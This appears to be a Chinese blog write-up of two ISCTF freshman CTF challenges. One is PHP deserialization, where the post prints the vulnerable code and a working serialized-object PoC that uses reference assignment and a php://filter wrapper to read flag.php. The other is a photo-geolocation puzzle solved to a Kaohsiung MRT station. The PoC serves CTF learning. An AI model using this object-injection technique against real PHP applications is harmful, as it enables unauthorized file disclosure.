ISCTF新生赛(引用传递&简单社工)

猫和老鼠

反序列化题目:

<?php
//flag is in flag.php
highlight_file(__FILE__);
error_reporting(0);

class mouse
{
public $v;

   public function __toString()
    {
        echo "Good. You caught the mouse:";
        include($this->v);
      
    }

}


class cat
{
    public $a;
    public $b;
    public $c;


    public function __destruct(){
        $this->dog();
        $this->b = $this->c;
        die($this->a);
    }
    public function dog()
    { 
        $this->a = "I'm a vicious dog, Kitty";    
    }
}

unserialize($_GET["cat"]); 

?>

分析代码得知,flag在flag.php 读取flag的点在 mouse类的include函数。因而就要触发toString函数

而cat类中的 dog函数会对变量 $this->a 赋值字符串,我们可以利用这个$this->b = $this->c来给 $this->a 赋值 new mouse类,具体方法就是让$this->b = &$this->a,引用传递,之后die($this->a);触发tostring函数,poc如下:

<?php

class mouse
{
    public $v="php://filter/read=convert.base64-encode/resource=flag.php";
}


class cat
{
    public $a;
    public $b;
    public $c;
}
$aa = new cat();
$aa -> c = new mouse();
$aa -> b = &$aa->a;
echo urlencode(serialize($aa));

?>

 base64解码得到flag

简单社工

开具一张图,flag格式为:ISCTF{MD5(XX省XX市XX区XX站)}

注:别用百度,google好一点

 不难看出这是一个地铁站,然后在动漫牌子上看见了高雄捷运,搜索后得知这是台湾的地铁站。

emmm确实不一样,动漫站牌    然后还可以看见一个时刻表以及 显目的 小港(南)

我们利用此信息搜索高的捷运的地铁线路表:

根据 小港(南) 上北下南,肯定是红线,然后我们 去高雄捷运官网,根据唯一已知的末班车时刻表信息区查一下对应的站点

看见 R14巨蛋站的时间和图片吻合   末班车往岡山00:29   末班车往小港00:22

 我们搜索一下巨蛋站的信息,再确认一下

从这里查看图片,看看有没有类似我们给出的图的痕迹:

 搜着搜着好多不是,但是最后猛地看见一个特别熟悉的背景,这不就是图里背面的画吗?

 最终得到:台湾省高雄市左营区巨蛋站

md5一下,correct

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值